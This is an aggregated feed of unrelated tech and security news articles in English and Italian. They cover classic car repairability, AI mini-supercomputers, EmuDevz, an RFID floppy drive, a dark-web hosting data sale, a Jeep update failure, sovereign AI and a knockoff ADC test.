As much as I appreciate these classics, though, there’s almost nothing that could compel me to purchase a modern vehicle from either of these brands. The core reason is that both have essentially abandoned the design philosophies that made them famous in the first place. And while it’s no longer possible to buy anything stamped Made in West Germany for obvious reasons, even a modern car with a VIN starting with a W doesn’t carry that same weight anymore. It more likely marks a vehicle destined for a lease term rather than one meant to be repaired and driven for decades, like my Beetle or my 300D.
Punch Buggy Blue
Starting with the downfall of Volkswagen, whose Beetle is perhaps the most iconic car ever made, their original stated design intent was to make something affordable and easily repairable with simple tools. The vehicles that came out of this era, including the Beetle, Bus, and Karmann Ghia, omitted many parts we’d think were absolutely essential on a modern car such as a radiator, air conditioner, ABS brakes, a computer, or safety features of any sort. But in exchange the vehicles are easily wrenched on for a very low cost.
For example, removing the valve covers only requires a flat screwdriver and takes about five seconds, and completing a valve adjustment from that point only requires a 13 mm wrench and maybe an additional half hour. The engines can famously be removed in a similar amount of time, and the entire bodies can be lifted off the chassis without much more effort. And some earlier models of Beetle will run just fine even without a battery, assuming you can get a push. As a result of cost and simplicity the Beetle and the other vehicles based on it were incredibly popular for almost an entire century and drove VW to worldwide fame.
This design philosophy didn’t survive the 80s and 90s, however, and this era saw VW abandon nearly everything that made it successful in the first place. Attempting any of the maintenance procedures listed above on a modern Jetta or Golf will have one scratching one’s head, wondering if there’s anything left of the soul of the Volkswagen from the 50s and 60s. Things like having to remove the bumper and grille to change a headlight assembly or removing the intake manifold to change a thermostat are commonplace now. They’ve also abandoned their low-cost roots as well, with their new retro-styled Bus many multiples of even the inflation-adjusted price of a Bus from the 1960s, well beyond what modern safety standards and technology would have added to the cost of the vehicle alone. Let’s also not forget that even when completely ignoring emissions standards, modern VWs have still remained overpriced and difficult to repair.
VW Is Not Alone
The story of Mercedes ends up in almost exactly the same place but from a completely opposite starting point. Mercedes of the 60s and 70s was known for building mostly indestructible tanks for those with means who wanted to feel like they were riding in the peak of luxury. And that’s what Mercedes mostly delivered: leather seats, power windows, climate control, a comfortable ride, and in a package that would easily go hundreds of thousands of miles with basic maintenance. In the case of the W123 platform, this number often extended to a million miles, a number absolutely unheard of for modern vehicles.
This is the platform my 1984 300D was based on, and mine was well over 300,000 miles before we eventually parted ways. Mercedes of this era also made some ultra-luxury vehicles that could be argued to be the ancestors of modern Mercedes-Maybach like the Mercedes 600, a car with all of the power electronics replaced with hydraulics like the windows, power reclining rear seat, and automatic trunk.
While the Mercedes 600 isn’t exactly known for being a hobbyist car nowadays, the W123s certainly are. My 300D was simple by modern Mercedes standards with a mechanical fuel injected diesel engine that was excessively overbuilt. The mechanical climate control systems made out of springs, plastic, and hope might not be working anymore but I’d be truly surprised if the engine from this car isn’t still running today.
Even plenty of gas-powered Mercedes of that era are wrenchable (as long as you bought one from before Chrysler poisoned the company) and also deliver the luxury that Mercedes was known for and is still coasting on. And this ability to repair or work on a car at a minimum of cost didn’t mean Mercedes sacrificed luxury, either. These cars were known for comfort as well as reliability, something rarely combined in modern cars.
Indeed, like Volkswagen, it seems as though a modern Mercedes will make it just as far as the end of the first lease before it turns into an expensive maintenance nightmare. Mercedes at least has the excuse that it never recovered from infecting itself with Chrysler in the 90s, but Volkswagen has no corporate baggage as severe, instead making a conscious choice to regress towards the mean without the anchor of a lackluster American brand tied around its neck. But a few other other less-obvious things have happened that have crushed the souls of my favorite vintage auto makers as well.
Toyota
Japanese automakers disrupted everything in the 70s and 80s with cars that had everything Volkswagen used to be: simple, inexpensive, repairable, and arguably even more reliable. And, with the advent of Lexus in the 80s and their first model, the LS400, they showed that they could master the Mercedes traits of bulletproof luxury as well. They didn’t need nostalgia or marketing mythology; they just quietly built what Volkswagen and Mercedes once promised, and Volkswagen, Mercedes, and almost every other legacy automaker at the time were simply unable to compete on any of these terms. Many people will blame increasing safety and emissions requirements on the changes seen in the last three decades, but fail to account for the fact that Japanese brands had these same requirements but were able to succeed despite them.
Marketing
Without being able to build reliable vehicles at a competitive price to Toyota, or Honda, or others, these companies turned to their marketing departments and away from their engineers. Many car makers, not just Mercedes and VW, chase gadgetry and features today rather than any underlying engineering principles. They also hope to sell buyers on a lifestyle rather than on the vehicle itself. With Mercedes it’s the image of luxury rather than luxury itself, and for Volkswagen especially it’s often nostalgia rather than repairability or reliability.
This isn’t limited to car companies, either. The 80s and 90s also ushered in a more general time of prioritizing stock holders and quarterly earnings rather than customers, long-term thinking, and quality. Companies like Boeing, GE, Craftsman, Sony, and Nokia all have fallen to victim to the short-term trend at the expense of what once made them great.
Designing for Assembly Rather than Repair
And, if customers are only spending money on a lease term it doesn’t really matter if the cars last longer than that. So, it follows that the easiest way to trim costs when not designing for longevity is to design in ways that minimize assembly cost rather than costs of ownership. That’s partially how we get the classic “remove the bumper to replace the headlight” predicament of many modern vehicles: these cars are designed to please robots on the assembly line, not humans with wrenches.
Dealerships
The way that we’ve structured car buying as a society bears some of this burden as well. Dealerships, especially in North America, are protected by law and skew the car ownership experience significantly, generally to the detriment of car owners. Without these legal protections the dealership model would effectively disappear overnight, and their lobbying groups have fought tooth-and-nail to stop newer companies from shipping cars directly to owners. Not only do dealerships drive up the cost of purchasing a vehicle compared to if it were legally possible to buy direct from a manufacturer, they often make the bulk of their profits on service. That means their incentives are also aligned so that the more unreliable and complex vehicles become, the more the dealerships will benefit and entrench themselves further. This wasn’t as true when VW and Mercedes were making the vehicles that made them famous, but has slowly eroded what made these classics possible in the modern world.
Hope? Probably Not.
There’s no sign that any of these trends are slowing down, and to me it seems to be part of a broader trend that others like [Maya] have pointed out that goes beyond cars. And it’s a shame too as there’s a brand new frontier of electric vehicles that could (in theory) bring us back to a world where we could have reliable, repairable vehicles again. EVs are simpler machines at heart, and they could be the perfect platform for open-source software, accessible schematics, and owner repair. But manufacturers and dealers aren’t incentivized to build anything like the Volkswagens or Mercedes of old, electric or otherwise, even though they easily could. I also won’t hold my breath hoping for [Jeff Bezos] to save us, either, but I’d be happy to be proven wrong.
And I also don’t fault anyone for appreciating these legacy brands. I’ve picked on VW and Merc here because I’ve owned them and appreciate them too, or at least what they used to represent. The problem is that somewhere along the way, loyalty to engineering and design ideals got replaced by loyalty to the logo itself. If we really care about what made cars like the Beetle and 300D special in the first place, we should be demanding that the companies that built them live up to those values again, not making excuses when they don’t.
So for now, I’ll keep gravitating toward the vehicles that came closest to those ideals. Others at Hackaday have as well, notably [Lewin] and his Miata which certainly fits this bill. Although I don’t have my VW or Mercedes anymore, I currently have a ’19 Toyota pickup, largely designed in the early 2000s, which isn’t glamorous but it’s refreshingly honest by modern standards and is perhaps a last gasp from this company’s soul, as Toyota now risks following the same path that hollowed out Volkswagen and Mercedes: swapping durability and practicality for complexity, flashy features, and short-term profits. I was also gifted an old Buick with an engine I once heard described as “the time GM accidentally made a Toyota engine.” The rubber bits may be dry-rotting away, but it’s a perfect blend of my Beetle and my 300D because it’s cheap, comfortable, reliable, and fixable (and the climate control actually works). The only thing missing is that little stamp: Made in West Germany.
L’era dei Supercomputer in una mano sta arrivando! GIGABYTE ATOM: Un petaflop e 128 GB a tutta AI
Il 15 ottobre, oltre alla tanto decantata soluzione NVIDIA DGX Spark, creata in collaborazione tra NVIDIA e Mediatek, un altro mini acceleratore AI ha fatto capolino nel mondo: il GIGABYTE ATOM.
GIGABYTE Technology, ha annunciato il lancio ufficiale del suo AI TOP ATOM, una piattaforma basata sul superchip NVIDIA Grace Blackwell GB10, la stessa del DGX Spark.
Questa soluzione innovativa presenta un design leggero compatibile con l’alimentazione domestica standard e viene fornita con lo stack software NVIDIA AI preinstallato, offrendo potenti prestazioni di elaborazione, rendendola una piattaforma ideale per la prototipazione, la messa a punto e l’inferenza dell’IA.
L’AI TOP ATOM è dotato di 128 GB di memoria di sistema condivisa unificata, espandibile fino a 4 TB di storage SSD, e offre fino a 1 petaFLOP di prestazioni di elaborazione AI FP4, supportando l’elaborazione locale di modelli linguistici di grandi dimensioni con un massimo di 200 miliardi di parametri.
Per applicazioni avanzate, gli utenti possono collegare due AI TOP ATOM tramite NVIDIA ConnectX-7, superando i limiti di un singolo sistema e scalando per eseguire modelli AI con un massimo di 405 miliardi di parametri tramite cluster computing per gestire carichi di lavoro AI ad alta intensità.
Per fornire una soluzione completa per lo sviluppo di intelligenza artificiale generativa, AI TOP ATOM integra lo stack software AI di NVIDIA, offrendo un’ampia gamma di strumenti, framework di sviluppo e librerie per accelerare lo sviluppo di progetti di intelligenza artificiale.
Questa soluzione incorpora anche l’esclusivo software AI TOP Utility di GIGABYTE, che, attraverso la sua interfaccia intuitiva, supporta applicazioni di fine-tuning, inferenza, deployment e machine learning (ML) basate su Large Language Model (LLM) e Large Multimodal Model (LMM), garantendo al contempo la privacy e la sicurezza dei dati locali.
Che tu sia uno sviluppatore di intelligenza artificiale, un ricercatore, uno studente o un istituto scolastico, GIGABYTE AI TOP ATOM offre una soluzione scalabile ed economica per accelerare l’innovazione nell’intelligenza artificiale. Per ulteriori informazioni sul prodotto, visita il sito web ufficiale di GIGABYTE e verifica la disponibilità presso i distributori e i rivenditori locali.
L'articolo L’era dei Supercomputer in una mano sta arrivando! GIGABYTE ATOM: Un petaflop e 128 GB a tutta AI proviene da Red Hot Cyber.
100 anni di Intelligence italiana! Mattarella celebra il centenario del SIM al Quirinale
Il 15 ottobre 2025 segna un anniversario di eccezionale rilievo nella storia della sicurezza nazionale italiana: cento anni dalla nascita del Servizio Informazioni Militare (SIM), primo servizio di intelligence del Paese, istituito nel 1925 con regio decreto.
Il SIM nacque con l’obiettivo di unificare le strutture informative di Esercito, Marina e Aeronautica, ponendo le basi per un sistema coordinato di tutela della sicurezza dello Stato.
Da quel momento, l’intelligence italiana ha attraversato un secolo di profonde trasformazioni, passando dalle sue origini militari del primo dopoguerra all’attuale Sistema di informazione per la sicurezza della Repubblica, definito dalla legge n. 124 del 2007.
Questa evoluzione ha accompagnato i momenti più significativi della storia nazionale, dalla nascita della Repubblica alle grandi sfide internazionali contemporanee.
L’intelligence, nel corso del tempo, ha consolidato un ruolo centrale nel garantire la sicurezza delle istituzioni democratiche, la protezione dei cittadini e la collaborazione internazionale contro minacce globali e conflitti emergenti. Le sue attività, sempre più integrate con quelle dei partner esteri, si fondano oggi sui principi di legalità, trasparenza e difesa dei valori costituzionali.
Le celebrazioni del Centenario
Per celebrare il traguardo del Centenario, è stato predisposto un programma di iniziative istituzionali finalizzato a valorizzare il contributo dell’Intelligence al Paese e a rafforzare la consapevolezza pubblica del suo ruolo strategico.
Tra le iniziative spiccano l’emissione di un francobollo commemorativo all’interno della serie “Eccellenze del sistema produttivo e del Made in Italy” e la coniazione di una moneta celebrativa a tiratura limitata.
L’incontro al Quirinale
In occasione di questo importante anniversario, il Presidente della Repubblica Sergio Mattarella ha ricevuto al Quirinale una delegazione dei Servizi di intelligence italiani.
All’incontro hanno partecipato il Sottosegretario di Stato alla Presidenza del Consiglio dei Ministri e Autorità delegata per la Sicurezza della Repubblica, Alfredo Mantovano, il Direttore generale del Dipartimento delle Informazioni per la Sicurezza (DIS), Vittorio Rizzi, il Direttore dell’Agenzia per le Informazioni e la Sicurezza Esterna (AISE), Giovanni Caravelli e il Direttore dell’Agenzia per le Informazioni e la Sicurezza Interna (AISI), Bruno Valensise.
L’incontro ha rappresentato un momento di riconoscimento per un secolo di impegno costante a tutela della Repubblica, nel segno di un’intelligence sempre più moderna, civile e orientata al servizio dei cittadini.
L'articolo 100 anni di Intelligence italiana! Mattarella celebra il centenario del SIM al Quirinale proviene da Red Hot Cyber.
EmuDevz is Literally a Software Game
The idea of gamifying all the things might have died down now that the current hype is shoving AI into all the things — but you’ve probably never seen it quite like EmuDevz, a game in which you develop an 8-bit emulator by [Rodrigo Alfonso].
There’s a lot of learning you’ll have to do along the way, about programming and how retro systems work, including diving into 6502 assembly code. Why 6502? Well, the emulator you’re working on (it’s partially-written at the start of the game; you need only debug and finish the job) is for a fantasy system called the NEEES “an antique game console released in 1983”. It’s the NEEES and not NES for two reasons. One, Nintendo has lawyers and they really, really know how to use them. Two, by creating a fantasy console that is not-quite-a-Famicom, the goalposts for EmuDevz can be moved a bit closer in.
The in-game emulator will handle most NES behavior, assuming you do your part correctly. A selection of homebrew NES games is included with EmuDevz, and they all run fine. A neat touch is giving you the ROMs for offline use as rewards when you get them running correctly. If some edge cases and exotic behaviours get left behind in the interests of simplicity, just remember– it’s not a NES, it’s a NEEES, and who can say? Perhaps this simplified system is exactly how it worked in the alternate universe where this game is set.
Aside from the invaluable assembly code, the work is done in JavaScript, which might not be everybody’s cup of tea. On the other hand, the whole thing is open-source (MIT license for the code, CC for the content) so if you really, really hate JS but love the idea of a learning game like this, you could fork to the language of your choice and learn even more.
Regardless of the language used, we like this model and think the “game where you learn to make games” is a great educational model for programming skills that ought to be used more often. For an idea of what it looks like, check out the trailer below.
Thanks to [Rodrigo Alfonso] for the tip. If you’ve got a great gamified learning tool — or any other cool hack, for that matter — the tips line is fun and rewarding, even if we haven’t tried to gamify it.
youtube.com/embed/sBhFulSp4KQ?…
Il DGX Spark è in vendita. Un Supercomputer per AI sul palmo di una mano!
Ne avevamo parlato il 29 agosto del DGX Spark, ma ora sembra che NVIDIA lo abbia rilasciato ed è già andato in sold-out.
La rivoluzione dell’intelligenza artificiale è arrivata, e ora sta nel palmo della mano. L’NVIDIA DGX Spark, è basato sul superchip NVIDIA GB10 Grace Blackwell e a partire dal 15 di ottobre è stato messo in vendita.
Questo rivoluzionario supercomputer personale di intelligenza artificiale consente agli sviluppatori di prototipare, perfezionare e inferire modelli di intelligenza artificiale di grandi dimensioni sul desktop.
Il GB10 sfrutta l’esperienza di MediaTek nella progettazione di CPU, sottosistemi di memoria e interfacce ad alta velocità ad alte prestazioni e a basso consumo energetico per alimentare la CPU Arm Grace a 20 core.
Il GB10 offre fino a 1 PFLOP di prestazioni di intelligenza artificiale per accelerare la messa a punto dei modelli e l’inferenza in tempo reale. Gli sviluppatori possono lavorare con modelli di grandi dimensioni fino a 200 miliardi di parametri o utilizzare la tecnologia di rete ConnectX-7 integrata per collegare due sistemi DGX Spark per attività di inferenza che coinvolgono modelli fino a 405 miliardi di parametri.
Il design è ultra compatto e si adatta facilmente a un desktop e funziona in modo efficiente utilizzando una presa elettrica standard.
“DGX Spark inaugurerà la prossima era della prototipazione AI e porterà avanti la nostra missione di rendere la tecnologia di qualità più accessibile dall’edge al cloud, risolvendo al contempo le sfide in termini di prestazioni e consumo energetico”, ha affermato Vince Hu, Corporate Vice President del Data Center and Compute Business Group di MediaTek. “Il GB10 Superchip sfrutta la nostra competenza nell’elaborazione ad alte prestazioni per il data center, combinata con le nostre tecnologie di risparmio energetico per dispositivi consumer, progettate appositamente per gestire carichi di lavoro AI”.
La collaborazione con GB10 si basa sul lavoro di MediaTek con NVIDIA in diversi settori verticali, portando funzionalità AI avanzate a data center iperscalabili, applicazioni IoT e veicoli software-defined.
MediaTek collabora con marchi leader per trasformare idee innovative in prodotti scalabili, dai dispositivi di uso quotidiano ai sistemi aziendali e cloud. Le nostre piattaforme unificano elaborazione, AI, connettività e software di sistema per offrire prestazioni per watt leader del settore in design innovativi e affidabili.
L'articolo Il DGX Spark è in vendita. Un Supercomputer per AI sul palmo di una mano! proviene da Red Hot Cyber.
RFIDisk: When Floppy Drives Go Contactless
Not too long ago, part of using a computer was often finding the correct disk for the application you wanted to run and inserting it into your machine before you could start. With modern storage, this is largely a thing of the past. However, longing for some of that nostalgia, [ItsDanik] has been developing the RFIDisk, a 3D printed floppy drive that can kick off applications when their disk is inserted.
The desktop enclosure is printed to look like a standalone floppy drive, allowing use with either desktops or laptops. There’s the familiar 3.5 inch slot ready for your floppy disk, and there’s also a 1.3 in. OLED display on the front giving you feedback on the status of the RFIDisk — including telling you what’s currently inserted. Inside the enclosure is an Arduino Uno and an MFRC522 RFID reader. As the name would suggest, the way the RFIDisk enclosure reads its media is via NFC, not the traditional magnetic reader. Due to being RFID-based, the disks printed for the RFIDisk are solid without moving parts, but enclose a 25 mm NTAG213 NFC tag.
On the software side, [ItsDanik] has developed the RFIDisk Manager Python application, which is used to tie specific NFC tag IDs to commands to run when that tag is read. The application includes some nice features, such as being able to adjust the commands for both when the disk is first read and when it’s removed from the RFIDisk. You can also change what shows up on the OLED screen when the cartridge is inserted.
Using NFC to simulate physical media is a clever trick we’ve seen before, but if you’re looking for something with a bit more physical engagement, you could always put your USB devices into 3D printed cartridges.
Allarme: migliaia di siti italiani a rischio! 526.000 siti e 6.500 db in vendita nel Darkweb
Un nuovo post sul dark web offre l’accesso completo a migliaia di server e database MySQL appartenenti a provider italiani di hosting condiviso.
Nelle ultime ore è apparso su un forum underground un nuovo thread dal titolo inequivocabile: “Italin hosting service sites – 9 more 40 servers – 526193 site’s backup – 4631 hosting customer – 6546 MySQL db’s”.
Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Al momento, non è possibile verificare in modo indipendente l’autenticità delle informazioni riportate, poiché l’organizzazione coinvolta non ha ancora rilasciato un comunicato ufficiale sul proprio sito web. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence.
L’autore del post, che utilizza il nickname 010010, è un utente storico della piattaforma (attivo dal 2018) e offre in vendita per 1.000 $ in TRC20 un intero dump di dati provenienti – a suo dire – da infrastrutture di hosting italiani
Le schermate pubblicate a corredo del post mostrano chiaramente:
- Un dump SQL di grandi dimensioni (1,33 GB) contenente 16 file, nominati in modo riconducibile a diversi ambienti o clienti;
- Accesso completo ai database MySQL, con tanto di tabella
t_payservice_mysqlcontenente username e password in chiaro di oltre 6.500 istanze; - Account clienti e codici utente, potenzialmente appartenenti a reseller o a clienti finali di società di web hosting italiane.
Un dettaglio non trascurabile è la promessa dell’autore: “I will give the phpmyadmin mysql root password”, segno che l’accesso non si limita ai dati ma si estende all’intero sistema di gestione.
OSINT: chi è il venditore? Profilo preliminare “010010”
Abbiamo condotto un’analisi OSINT preliminare sulle evidenze pubblicate. I punti salienti:
- Nick dell’attore:
010010. È un nickname binario, breve, e con forte valenza “technic/hacker” — scelta non casuale per un venditore di dati. L’account sul forum è attivo dal 2018, con reazioni e credenziali che denotano una reputazione consolidata (non è un profilo usa-e-getta). - Contatto e monetizzazione: l’annuncio chiede 1000$ in USDT TRC20 e punta l’interesse su compratori “tecnici” (es. “people who know how to use the hosting panel”). Il contatto è un handle Telegram obfuscato — pattern tipico per eludere moderazione e dorks.
- Screenshot: uno degli screenshot mostra la finestra di Explorer in lingua turca (etichette come Tür, Boyut, Tamam), e nella barra appare il nome
stanislav karacetincon profile pathC:\Users\stani\Documents\hostingdatabase. Questo fornisce due indizi concreti: il dump è stato aggregato e salvato su una macchina con OS impostato in turco, e l’autore dello screenshot (o il proprietario della macchina che ha generato i file) è identificabile come “stanislav / stani” a livello di profilo locale. - Temporalità: i file riportano timestamp del 14/10/2025 fra le 10:44 e le 11:27, compatibili con la finestra temporale della pubblicazione.
Ipotesi di lavoro (high-level): il venditore è verosimilmente un operatore tecnico, potenzialmente attivo dall’area turcofona o in possesso di una macchina configurata in lingua turca. Il comportamento (nick binario, monetizzazione in TRC20, contatto Telegram obfuscato) è coerente con vendor dell’area TR / Est Europa attivi nei mercati di credenziali e database.
Un caso che evidenzia la fragilità dell’hosting condiviso
Sebbene non siano stati ancora identificati i provider coinvolti, le evidenze tecniche mostrano un pattern tipico delle infrastrutture di web hosting condiviso italiane: database nominati “clienti_nomeaziendaXX”, riferimenti a domini multipli e tabelle replicate per centinaia di utenti.
Questa tipologia di compromissione è spesso il risultato di:
- pannelli di amministrazione esposti (cPanel, Plesk, DirectAdmin) con credenziali deboli o riutilizzate;
- vulnerabilità note in CMS o web application ospitate (WordPress, Joomla, PrestaShop);
- scarsa segmentazione tra clienti, che permette a un singolo accesso di propagarsi a tutto il nodo.
Un rischio concreto per migliaia di siti e aziende italiane
Se i dati in vendita dovessero essere autentici, l’impatto sarebbe significativo: i database mostrati contengono account clienti, password, codici dominio e backup completi dei siti.
Informazioni di questo tipo possono essere utilizzate per:
- furti d’identità digitale e clonazione di siti web legittimi;
- accessi non autorizzati ai pannelli di amministrazione;
- infezioni mirate tramite supply chain (iniezione di backdoor o malware nei CMS);
- attacchi secondari verso i clienti dei provider coinvolti.
Ancora una volta, i forum underground confermano la loro funzione di mercato parallelo delle infrastrutture compromesse, dove dump SQL, accessi RDP e pannelli Plesk vengono venduti a peso d’oro.
Nel caso odierno, la matrice italiana del materiale rappresenta un ulteriore campanello d’allarme per un settore – quello dell’hosting condiviso – che continua a soffrire di una cronica mancanza di segmentazione e hardening.
Come spesso accade in questi contesti, il valore economico richiesto (appena 1.000 $) è inversamente proporzionale al rischio potenziale per le migliaia di aziende e professionisti che potrebbero trovarsi esposti.
Red Hot Cyber continuerà a monitorare la diffusione di questo dump e l’eventuale correlazione con provider noti sul territorio italiano. Per ora, resta l’ennesimo monito su quanto fragile possa essere la sicurezza “a monte” di chi ospita ogni giorno migliaia di siti web.
L'articolo Allarme: migliaia di siti italiani a rischio! 526.000 siti e 6.500 db in vendita nel Darkweb proviene da Red Hot Cyber.
Un Aggiornamento software rende inutilizzabili i veicoli Jeep 4xe
Un aggiornamento software rilasciato lo scorso fine settimana per i modelli ibridi Jeep 4xe ha causato un grave malfunzionamento: i veicoli hanno smesso di funzionare, lasciando i proprietari letteralmente bloccati. Il problema si è verificato dopo un aggiornamento over-the-air non riuscito del sistema uConnect il 10 ottobre. Il problema ha bloccato il modulo telematico, rendendo i veicoli non utilizzabili.
La sera del 10 ottobre, sui forum dei proprietari di Jeep hanno iniziato ad apparire segnalazioni di guasti diffusi. Un rappresentante dell’assistenza clienti, che si faceva chiamare Kori, ha intimato agli utenti di astenersi dall’installare l’aggiornamento e ha promesso che la distribuzione del file era già stata sospesa. Tuttavia, per molti automobilisti era troppo tardi: avevano già aggiornato il sistema e non erano più in grado di guidare i loro veicoli.
Le prime vittime hanno descritto come i loro veicoli si spegnessero improvvisamente durante la guida. Un proprietario, un ingegnere infrastrutturale per Wells Fargo, ha affermato di aver perso aderenza a bassa velocità ed essere riuscito a tornare a casa, mentre altri si sono trovati in una situazione molto più pericolosa: le loro auto si sono spente proprio in autostrada. Ha osservato che l’errore di codifica non era stato chiaramente testato correttamente e ha sottolineato che tali malfunzionamenti possono essere letali.
Un altro proprietario di una Jeep ha accettato l’aggiornamento ignaro del problema. Quella mattina, dopo aver letto messaggi allarmanti in un gruppo di proprietari di 4xe, ha controllato il veicolo e ha scoperto che non rispondeva più ai comandi, si rifiutava di attivare la modalità di guida e il quadro strumenti lampeggiava con diversi messaggi di errore. Dopo aver contattato la concessionaria, ha avuto conferma che il problema era diffuso e interessava almeno i modelli Wrangler 4xe del 2024.
Alcuni utenti hanno segnalato di aver dovuto chiamare un carro attrezzi per far riparare i propri veicoli. Un membro del forum ha osservato che la sua concessionaria ha ricevuto diverse richieste simili nel giro di un’ora. Altri hanno espresso indignazione per il fatto che le concessionarie facessero pagare la diagnostica, nonostante la chiara responsabilità del produttore.
Il giorno dopo l’incidente, Stellantis, la società madre di Jeep, ha rilasciato una soluzione over-the-air che ha ripristinato la funzionalità del veicolo. I proprietari hanno confermato che, dopo l’installazione del nuovo file e diversi riavvii, il motore si è riavviato e il sistema ha smesso di generare errori. Tuttavia, l’incidente ha sollevato numerosi dubbi sui processi di test interni e sulle procedure di rilascio degli aggiornamenti.
Tali guasti nei sistemi automobilistici stanno diventando sempre più comuni con la crescente complessità dell’elettronica e la diffusione dei meccanismi OTA. L’errore di aggiornamento di uConnect ha dimostrato che anche un singolo file errato può paralizzare i veicoli.
L'articolo Un Aggiornamento software rende inutilizzabili i veicoli Jeep 4xe proviene da Red Hot Cyber.
Ma quale AI Sovrana se gira nei server e negli algoritmi di una azienda Statunitense!
Quest’anno, OpenAI ha annunciato una serie di progetti con governi stranieri per la creazione di sistemi di “intelligenza artificiale sovrana”. Secondo l’azienda, alcuni di questi accordi sono in fase di negoziazione con le autorità statunitensi. L’obiettivo è quello di dare ai leader nazionali un maggiore controllo sulla tecnologia che ha il potenziale per trasformare le loro economie.
Negli ultimi mesi, “IA sovrana” è diventata una parola d’ordine a Washington e nella Silicon Valley. I sostenitori ritengono fondamentale che i sistemi sviluppati nei paesi democratici siano attivamente diffusi a livello globale, soprattutto perché i modelli cinesi vengono sempre più esportati.
Nel suo piano d’azione di luglio per l’IA, l’amministrazione Trump ha formulato questa idea come segue: la diffusione delle tecnologie americane dovrebbe impedire ai rivali strategici di rendere gli alleati dipendenti dalle decisioni di fornitori “ostili”.
Per OpenAI, muoversi in questa direzione significa lavorare non solo con le democrazie. L’azienda sta collaborando con gli Emirati Arabi Uniti, dove il potere è conferito a una federazione di monarchie. Il responsabile della strategia di OpenAI, Jason Kwon, afferma che interagire con regimi non democratici può spingerli verso una maggiore apertura. Kwon privilegia l’inclusione piuttosto che l’isolamento, e questo approccio a volte funziona, a volte no.
I critici sottolineano che argomenti simili furono sollevati nei confronti della Cina vent’anni fa. All’epoca, gli Stati Uniti puntavano sull’integrazione economica come via verso la liberalizzazione. Di conseguenza, molte aziende americane trassero profitto dal commercio, mentre le politiche di Pechino si inasprivano.
Il dibattito si è concentrato anche su cosa costituisca la vera sovranità. Alcuni esperti ritengono che senza la possibilità di ispezionare e, in una certa misura, controllare il modello, la sovranità sia impossibile. Clement Delange, CEO di Hugging Face, afferma che “non c’è sovranità senza open source”. In questo ambito, la Cina ha già assunto un ruolo guida, con i suoi modelli open source che stanno rapidamente guadagnando popolarità oltre i suoi confini.
Il termine “IA sovrana” comprende attualmente diverse architetture. In alcuni progetti, lo Stato ottiene il controllo parziale sullo stack, mentre in altri ha il controllo completo sull’infrastruttura, dall’hardware al software. Il denominatore comune a tutte le iniziative è la legalità. Come osserva Tricia Ray del GeoTech Center dell’Atlantic Council, vincolare almeno una parte dell’infrastruttura a confini geografici rende la sua progettazione, sviluppo e implementazione soggette al diritto nazionale.
Negli Emirati Arabi Uniti, una partnership tra Stati Uniti e OpenAI sta realizzando un cluster di data center con una capacità totale di 5 GW. Si prevede che circa 200 MW di questa capacità saranno operativi entro il 2026. Il Paese sta inoltre implementando ChatGPT per i servizi governativi. Tuttavia, non vi sono indicazioni che il governo otterrà l’accesso ai componenti interni del modello o il diritto di modificarne il funzionamento.
Solo pochi anni fa, l’idea di implementare infrastrutture di intelligenza artificiale in paesi autoritari avrebbe potuto scatenare proteste nella Silicon Valley. Nel 2019, i dipendenti di Google sono riusciti a chiudere un progetto di ricerca censurato per la Cina. Ora, notano gli analisti, l’atteggiamento è diventato più pragmatico. La logica del “lavorare in un paese significa obbedire alle sue leggi” si è notevolmente normalizzata, e quindi si registrano poche proteste interne attorno alle principali iniziative di LLM.
Kwon sottolinea che OpenAI non eliminerà le informazioni su richiesta delle autorità straniere. L’azienda potrebbe aggiungere risorse e funzionalità locali, ma non prevede di “ripulire” i dati.
Mentre le aziende americane stanno stringendo alleanze internazionali, le aziende cinesi stanno attivamente distribuendo modelli open source in tutto il mondo. Alibaba, Tencent e startup come DeepSeek stanno pubblicando modelli base con funzionalità paragonabili a quelle delle loro controparti occidentali. Alibaba afferma di aver scaricato oltre 300 milioni di software della famiglia Qwen e di averne creati oltre 100.000 modelli derivati. Qwen sta facendo progressi significativi in Giappone grazie al suo supporto linguistico locale di alta qualità. Il mese scorso, i ricercatori degli Emirati Arabi Uniti hanno presentato un nuovo modello basato su Qwen2.5.
Anche OpenAI è tornata a un formato open source questa primavera, rilasciando i primi modelli open-weights dai tempi di GPT-2. Secondo fonti del settore, la decisione è stata influenzata dall’enorme popolarità dei modelli open source di DeepSeek all’inizio di quest’anno. Delang osserva che concentrarsi sull’open source accelera il progresso. Le aziende adottano rapidamente le rispettive tecniche di formazione di successo, motivo per cui, in soli cinque anni, i team cinesi sono passati da essere in ritardo a essere paragonabili a quelli statunitensi, assumendo una posizione di leadership nell’ecosistema open. Stima che la Cina potrebbe assumere la leadership nell’intelligenza artificiale già dal prossimo anno.
C’è anche un aspetto pragmatico. In un ambiente chiuso, lo stesso ciclo di addestramento ad alta intensità energetica viene spesso ripetuto in parallelo da diversi laboratori. In un ecosistema aperto, un centro addestra e pubblica il modello, i centri vicini non devono impiegare le stesse risorse e la capacità è distribuita in modo più efficiente.
OpenAI ritiene che l’intelligenza artificiale sovrana non sia una scelta tra “aperto” e “chiuso”. Diversi paesi desiderano sfruttare il meglio di entrambi i mondi. Alcuni compiti sono più facilmente affrontabili con modelli commerciali su larga scala, mentre altri sono meglio basati su soluzioni open source che possono essere testate e adattate ai requisiti legali e di mercato locali.
L'articolo Ma quale AI Sovrana se gira nei server e negli algoritmi di una azienda Statunitense! proviene da Red Hot Cyber.
How bad can a $0.60 Knockoff ADS1115 ADC be?
Although the saying of caveat emptor rings loudly in the mind of any purveyor of electronic components, the lure of Very Cheap Stuff is almost impossible to resist. Sure, that $0.60 ADC on LCSC that swears it’s a Ti ADS1115 may be a knock-off since the same part on Digikey is $4 a pop, and that’s when you buy a pack of 1,000. Yet what if it’s a really good knockoff that provides similar performance for a fraction of the price? Cue [James Bowman] letting curiosity getting the better of him and ordering a stash of four boards presumably equipped with said cheapo knockoff part, mostly on account of getting all boards for a mere $2.97.
The goal was of course to subject these four purported ADS1115s to some testing and comparison with the listed performance in the Ti datasheet. Telling was that each of the ADCs on the boards showed different characteristics, noticeably with the Data Rate. This is supposed to be ±10% of the nominal, so 7.2 – 8.8 times per second in 8 samples per second mode, but three boards lagged at 6.5 – 7 SPS and the fourth did an astounding 300 SPS, which would give you pretty noisy results.
